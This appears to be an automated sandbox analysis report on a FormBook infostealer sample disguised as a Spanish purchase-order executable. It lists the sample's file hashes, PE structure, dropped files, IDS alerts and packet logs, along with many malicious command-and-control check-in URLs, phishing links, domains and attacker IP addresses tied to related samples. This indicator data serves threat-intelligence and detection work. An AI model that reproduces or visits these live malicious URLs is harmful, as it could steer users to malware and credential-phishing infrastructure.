	2024-09C33T37.exe	Get hash	malicious	FormBook	Browse	www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
	rBCPcomprobante.exe	Get hash	malicious	FormBook	Browse	www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
	Proforma_Invoice.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.epansion.com/ao65/?BR-hMX=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+a5ltJSnpB6j&Gzu=sFNxH
	003425425124526.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.epansion.com/ao65/?GR0=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+atqjoikrWmu&IDK=RJBh5RS0IZO8zhrP
	Nuevo_orden_pdf.exe	Get hash	malicious	FormBook	Browse	www.themicheline.com/g11y/?4hOl=Q/yQLYVAGKkMZrnE0iOJNdDJIeKID0+EwORul+wPjaygN5L5fjaaMR6aEX0pRQDKm1/B&l2Mt_N=fTAlQTwhPDH
	Hubnnuiisapctu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.epansion.com/ao65/?2d=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+ZVDqIufkgb4a3XCnQ==&3fC=vZeTzRlX84SHE
15.197.130.221	file.exe	Get hash	malicious	Unknown	Browse	vitalikcreatedethereumtobethenewworldorderscurrency.shop/get/65c3048a130dda59d2528286
	SecuriteInfo.com.Win32.PWSX-gen.8868.18243.exe	Get hash	malicious	Unknown	Browse	vitalikcreatedethereumtobethenewworldorderscurrency.shop/get/65c2ee4a130dda59d2527f28
	Quotaton.pdf.exe	Get hash	malicious	Unknown	Browse	vitalikcreatedethereumtobethenewworldorderscurrency.shop/get/65c29cdd130dda59d2527349
	chrome.apk	Get hash	malicious	Hydra	Browse	hjghgfgftdrdssst7654345.cfd/api/v1/device/check?screen=true
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader	Browse	integrityhomemtg.com/pma/
	FacFiscalDigitalenmi6Q8V_C(549).PDF.vbs	Get hash	malicious	Unknown	Browse	15.197.130.221/a/08/150822/au/logs/index.php?CHLG
	6.vbs	Get hash	malicious	Unknown	Browse	15.197.130.221/a/08/150822/au/logs/index.php?CHLG
	http://rbcroyal-secures.com	Get hash	malicious	Unknown	Browse	rbcroyal-secures.com/favicon.ico
	http://santan-schedule-help-id5.com/	Get hash	malicious	Unknown	Browse	santan-schedule-help-id5.com/track.php?domain=santan-schedule-help-id5.com&caf=1&toggle=answercheck&answer=yes&uid=MTY4MzU4NTEzNi44NTYxOjE2MTcxMzcyNWRjNzIyMTNkNzQ1MGJiODk0NTZiY2RiM2VhNDE1ZTA0NjMzN2JmNTM4M2UxYmI3N2FjN2FjNWY6NjQ1OTc4NzBkMTAyNg%3D%3D
	FATURA_DE_PAGAMENTO.exe	Get hash	malicious	FormBook	Browse	www.iranbaklava.com/de12/?WL08l6oh=y3FEHWw5oyiW0zUA6ys3NH5BCju+GNijWMs3Uub3khu4FFB/eJXoBqeJzutLdHhdt+cM&G6A=3fCdVR
172.104.233.69	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	www.boostyourselftoday.com/pz08/?mzrPV4R=0FaXmte0/P3knfwA0sMIwS1mD7E8vQQWGPcDD9zpFFyhOAUFaj5MXy9fjN2AdDBFU3yO&Rl=8pFP0r98Chvt5p5P

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.yassa-hany.online	DHL Factura Electronica Pendiente documento No 04BB25083.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.213
	Documento de confirmacion de orden de compra OC 1580070060.exe	Get hash	malicious	FormBook	Browse	103.224.212.213
	rBCPcomprobante.exe	Get hash	malicious	FormBook	Browse	103.224.212.213
www.kxn.ink	rDHLFacturaElec.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	172.67.132.76
www.kxn.ink	Banka odeme havale makbuzu 20240209 TL950000900.exe	Get hash	malicious	FormBook	Browse	104.21.12.188
www.aloyoga-uae.com	Documento di bonifico bancario intesa Sanpaola EUR43750 20240223.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	3.96.23.237
www.aloyoga-uae.com	Banka odeme havale makbuzu 20240209 TL950000900.exe	Get hash	malicious	FormBook	Browse	196.196.197.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LINODE-APLinodeLLCUS	Paid Invoice 2917-IN.HTML	Get hash	malicious	HTMLPhisher	Browse	139.162.55.233
	https://secure.adnxs.com/clktrb?id=360572&redir=//barslaves.com/guedassea/Novozymes/amVia0Bub3ZvenltZXMuY29t	Get hash	malicious	HTMLPhisher	Browse	69.164.216.107
	https://lp.vp4.me/tmqc	Get hash	malicious	HTMLPhisher	Browse	172.104.159.87
	https://www.google.com/url?q=https://www.google.me/amp/s/drentheplus%E3%80%82com/#9567bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20N??5698068956980689bmVpbC5zYXdicmlkZ2VAd2FsYnJvb2thc3NldC5jb20N/..=%7B=X2kVSIkTTl4pPibw25CZvHK1JBF1ofBi5698068956980689	Get hash	malicious	Fake Captcha, HTMLPhisher	Browse	172.105.14.207
	1AIemYSAZy.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	198.58.121.58
	n1KVzXM8Wk.exe	Get hash	malicious	AgentTesla	Browse	213.168.250.121
	https://es-mad-1.linodeobjects.com/imd/korian.html#4LRqoo3790CWqy30qlgcgdgtum804PGMBQKONRNANMRI816587GOEV11367Y15/A9JWvsdqcTFisTsjuCH	Get hash	malicious	HTMLPhisher	Browse	172.105.35.99
	HXgmHRSUEI.elf	Get hash	malicious	Mirai	Browse	172.104.21.89
	https://runrun.it/share/form/mqrK0cUcc7ZJi_In	Get hash	malicious	HTMLPhisher	Browse	172.105.152.65
	https://runrun.it/share/form/mqrK0cUcc7ZJi_In	Get hash	malicious	HTMLPhisher	Browse	172.105.152.65
TRELLIAN-AS-APTrellianPtyLimitedAU	http://followfoxconn.site	Get hash	malicious	Unknown	Browse	103.224.182.210
	http://optimalrebalancing.tk	Get hash	malicious	Unknown	Browse	103.224.182.253
	1AIemYSAZy.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	103.224.212.34
	DHL Factura Electronica Pendiente documento No 04BB25083.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.213
	REQ2024029.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	103.224.212.211
	MCYq2AqNU0.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	103.224.212.34
	CERTIFICATE OF REGISTRY_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.216
	VIMEKSIM PO# 1330 Confirmation_pdf.exe	Get hash	malicious	FormBook, GuLoader	Browse	103.224.212.216
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	103.224.212.213
	PaDQmSw2ud.dll	Get hash	malicious	Laplas Clipper	Browse	103.224.212.213
TANDEMUS	https://www.delldisplaymanagerwindows.com	Get hash	malicious	Unknown	Browse	15.197.193.217
	EGpGxFlJO8.exe	Get hash	malicious	Glupteba, Mars Stealer, SmokeLoader, Stealc, Vidar	Browse	15.197.142.173
	https://attacc.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://at-104354.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://mailboxai098.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://meetsoci.com	Get hash	malicious	Unknown	Browse	15.197.226.17
	BWV4hz5GdR.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	15.197.192.55
	mRWU3uqJ2O.exe	Get hash	malicious	FormBook	Browse	15.197.142.173
	EqBT3tJjy5.elf	Get hash	malicious	Unknown	Browse	206.8.197.224
	https://www.ungrbly.cn/	Get hash	malicious	Unknown	Browse	15.197.193.217
TANDEMUS	https://www.delldisplaymanagerwindows.com	Get hash	malicious	Unknown	Browse	15.197.193.217
	EGpGxFlJO8.exe	Get hash	malicious	Glupteba, Mars Stealer, SmokeLoader, Stealc, Vidar	Browse	15.197.142.173
	https://attacc.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://at-104354.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	https://mailboxai098.weeblysite.com/	Get hash	malicious	Unknown	Browse	15.197.193.217
	http://meetsoci.com	Get hash	malicious	Unknown	Browse	15.197.226.17
	BWV4hz5GdR.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc, Xmrig	Browse	15.197.192.55
	mRWU3uqJ2O.exe	Get hash	malicious	FormBook	Browse	15.197.142.173
	EqBT3tJjy5.elf	Get hash	malicious	Unknown	Browse	206.8.197.224
	https://www.ungrbly.cn/	Get hash	malicious	Unknown	Browse	15.197.193.217

Process:	C:\Users\user\Desktop\Solicitud de pedido Documento No 168646080.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1329
Entropy (8bit):	5.344106431119393
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E49E4184j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hb
MD5:	57BFF9062A242EEA852F3E2F464AC42E
SHA1:	23969D574EC734C71663AB4893424CDEAC7691D7
SHA-256:	D254D998EB4CE21BA57C20585806244B10C31B6C23AC22A26D5BEDA91A2ADCBA
SHA-512:	4666420308C3EB2332AB1907A4D75B6052612A4D8C3A821EAB3ECEA642CB3F23A5A8804C933047250415B6F09AA67E920F6A19482B484BEF8EA68E8609FCE0F3
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.354777075714867
Encrypted:	false
SSDEEP:	24:3gWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:QWSU4xymI4RfoUeW+mZ9tK8ND3
MD5:	0CBD5C86CC1353C7EF09E2ED3E0829E3
SHA1:	0FFE29A715ED1E32BB9491D3DD88FB72280ED040
SHA-256:	B7A6D1B47CEA0A5084460775416103112E56A7A423216183ABAC974960FD51E7
SHA-512:	C60EC6550188DCCD1EAD93CC49011BAC45134426ADEF81410468A1F613AD8F2E67AEF296F5C92092A62BFAC746FCA9DC8741FEC5600996F28A48BF2488E94D40
Malicious:	false
Reputation:	low
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jq0ncvdw.n2c.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kaqfzyxp.dt2.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khqrro1x.yhm.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qv44ywu5.3h5.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.81247334581912
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	Solicitud de pedido Documento No 168646080.exe
File size:	711'680 bytes
MD5:	eec85a3805bca7a05b1e669f3a043bc6
SHA1:	b149921ff8b37ccc526a47f170eff93d4746faf9
SHA256:	4a487c4228b0a8d316809fda3510b6153f392d4e80622293efa6c8f2c4f1cd83
SHA512:	d0ab584abfdb088290f6491e687cade9d4e010233d743aff4bd60d6f5245a3e69bead5b3a492a76ffda0c7792702aa73e495ca43e1fa02383f43dc9e50191df5
SSDEEP:	12288:98S+oGOKc/hbL9bW9ezytPCcyINFbn6UjD2BjnCKJ0BMlWqU:tbL9iyQCps5nL5bMgq
TLSH:	80E4E059236CAF72E67A4BF854A098510BF1352FA13EE54A0DC224DB6E75F608F42F43
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j./...............0.................. ........@.. .......................@............@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4af19a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE52FAD6A [Mon Nov 5 13:17:30 2091 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
inc edi
inc ebx
xor eax, 41423134h
xor al, 43h
pop edx
inc ebp
inc esp
pop edx
inc ecx
inc edi
inc ebp
xor al, 54h
inc ecx
cmp byte ptr [ecx+57h], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xaf147	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xb0000	0x584	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xb2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xabeb8	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xad1b8	0xad200	ce2ca1297f3d12eb9fdf5e0af9be8f6a	False	0.883984375	data	7.820552407910732	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xb0000	0x584	0x600	51ab8f8914b24652dd22bf80ea7fb335	False	0.4147135416666667	data	4.023320283656243	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xb2000	0xc	0x200	ace4c86fd6cfae100a9749fb62e5f1a5	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xb0090	0x2f4	data			0.44312169312169314
RT_MANIFEST	0xb0394	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/28/24-14:57:24.410156	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49719	80	192.168.2.7	13.228.106.35
02/28/24-14:57:02.918467	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49718	80	192.168.2.7	172.104.233.69
02/28/24-14:55:21.703259	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49711	80	192.168.2.7	18.167.179.176
02/28/24-14:56:21.301235	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49716	80	192.168.2.7	15.197.142.173
02/28/24-14:56:42.351336	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49717	80	192.168.2.7	15.197.130.221
02/28/24-14:58:24.644872	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49721	80	192.168.2.7	103.224.212.213
02/28/24-14:55:41.893387	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49713	80	192.168.2.7	3.96.23.237
02/28/24-14:58:04.170586	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49720	80	192.168.2.7	3.33.130.190
02/28/24-14:56:01.170610	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49715	80	192.168.2.7	104.21.12.188

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 28, 2024 14:55:21.393098116 CET	49711	80	192.168.2.7	18.167.179.176
Feb 28, 2024 14:55:21.702967882 CET	80	49711	18.167.179.176	192.168.2.7
Feb 28, 2024 14:55:21.703118086 CET	49711	80	192.168.2.7	18.167.179.176
Feb 28, 2024 14:55:21.703258991 CET	49711	80	192.168.2.7	18.167.179.176
Feb 28, 2024 14:55:22.011416912 CET	80	49711	18.167.179.176	192.168.2.7
Feb 28, 2024 14:55:22.011445045 CET	80	49711	18.167.179.176	192.168.2.7
Feb 28, 2024 14:55:22.011461973 CET	80	49711	18.167.179.176	192.168.2.7
Feb 28, 2024 14:55:22.011641979 CET	49711	80	192.168.2.7	18.167.179.176
Feb 28, 2024 14:55:22.011703968 CET	49711	80	192.168.2.7	18.167.179.176
Feb 28, 2024 14:55:22.319787025 CET	80	49711	18.167.179.176	192.168.2.7
Feb 28, 2024 14:55:41.787504911 CET	49713	80	192.168.2.7	3.96.23.237
Feb 28, 2024 14:55:41.893049002 CET	80	49713	3.96.23.237	192.168.2.7
Feb 28, 2024 14:55:41.893287897 CET	49713	80	192.168.2.7	3.96.23.237
Feb 28, 2024 14:55:41.893387079 CET	49713	80	192.168.2.7	3.96.23.237
Feb 28, 2024 14:55:42.000123978 CET	80	49713	3.96.23.237	192.168.2.7
Feb 28, 2024 14:55:42.000164032 CET	80	49713	3.96.23.237	192.168.2.7
Feb 28, 2024 14:55:42.000349045 CET	49713	80	192.168.2.7	3.96.23.237
Feb 28, 2024 14:55:42.000382900 CET	49713	80	192.168.2.7	3.96.23.237
Feb 28, 2024 14:55:42.105909109 CET	80	49713	3.96.23.237	192.168.2.7
Feb 28, 2024 14:56:01.047103882 CET	49715	80	192.168.2.7	104.21.12.188
Feb 28, 2024 14:56:01.170372009 CET	80	49715	104.21.12.188	192.168.2.7
Feb 28, 2024 14:56:01.170511961 CET	49715	80	192.168.2.7	104.21.12.188
Feb 28, 2024 14:56:01.170609951 CET	49715	80	192.168.2.7	104.21.12.188
Feb 28, 2024 14:56:01.293716908 CET	80	49715	104.21.12.188	192.168.2.7
Feb 28, 2024 14:56:01.334677935 CET	80	49715	104.21.12.188	192.168.2.7
Feb 28, 2024 14:56:01.334805012 CET	49715	80	192.168.2.7	104.21.12.188
Feb 28, 2024 14:56:01.335042953 CET	80	49715	104.21.12.188	192.168.2.7
Feb 28, 2024 14:56:01.335093021 CET	49715	80	192.168.2.7	104.21.12.188
Feb 28, 2024 14:56:01.457828045 CET	80	49715	104.21.12.188	192.168.2.7
Feb 28, 2024 14:56:21.204525948 CET	49716	80	192.168.2.7	15.197.142.173
Feb 28, 2024 14:56:21.298007011 CET	80	49716	15.197.142.173	192.168.2.7
Feb 28, 2024 14:56:21.298186064 CET	49716	80	192.168.2.7	15.197.142.173
Feb 28, 2024 14:56:21.301234961 CET	49716	80	192.168.2.7	15.197.142.173
Feb 28, 2024 14:56:21.393876076 CET	80	49716	15.197.142.173	192.168.2.7
Feb 28, 2024 14:56:21.394699097 CET	80	49716	15.197.142.173	192.168.2.7
Feb 28, 2024 14:56:21.394715071 CET	80	49716	15.197.142.173	192.168.2.7
Feb 28, 2024 14:56:21.394823074 CET	49716	80	192.168.2.7	15.197.142.173
Feb 28, 2024 14:56:21.394823074 CET	49716	80	192.168.2.7	15.197.142.173
Feb 28, 2024 14:56:21.487745047 CET	80	49716	15.197.142.173	192.168.2.7
Feb 28, 2024 14:56:42.259443998 CET	49717	80	192.168.2.7	15.197.130.221
Feb 28, 2024 14:56:42.351093054 CET	80	49717	15.197.130.221	192.168.2.7
Feb 28, 2024 14:56:42.351226091 CET	49717	80	192.168.2.7	15.197.130.221
Feb 28, 2024 14:56:42.351336002 CET	49717	80	192.168.2.7	15.197.130.221
Feb 28, 2024 14:56:42.442886114 CET	80	49717	15.197.130.221	192.168.2.7
Feb 28, 2024 14:56:42.565313101 CET	80	49717	15.197.130.221	192.168.2.7
Feb 28, 2024 14:56:42.565335035 CET	80	49717	15.197.130.221	192.168.2.7
Feb 28, 2024 14:56:42.565427065 CET	49717	80	192.168.2.7	15.197.130.221
Feb 28, 2024 14:56:42.565450907 CET	49717	80	192.168.2.7	15.197.130.221
Feb 28, 2024 14:56:42.571865082 CET	80	49717	15.197.130.221	192.168.2.7
Feb 28, 2024 14:56:42.571923971 CET	49717	80	192.168.2.7	15.197.130.221
Feb 28, 2024 14:56:42.658727884 CET	80	49717	15.197.130.221	192.168.2.7
Feb 28, 2024 14:57:02.735073090 CET	49718	80	192.168.2.7	172.104.233.69
Feb 28, 2024 14:57:02.917978048 CET	80	49718	172.104.233.69	192.168.2.7
Feb 28, 2024 14:57:02.918111086 CET	49718	80	192.168.2.7	172.104.233.69
Feb 28, 2024 14:57:02.918467045 CET	49718	80	192.168.2.7	172.104.233.69
Feb 28, 2024 14:57:03.101046085 CET	80	49718	172.104.233.69	192.168.2.7
Feb 28, 2024 14:57:03.396889925 CET	80	49718	172.104.233.69	192.168.2.7
Feb 28, 2024 14:57:03.402302027 CET	80	49718	172.104.233.69	192.168.2.7
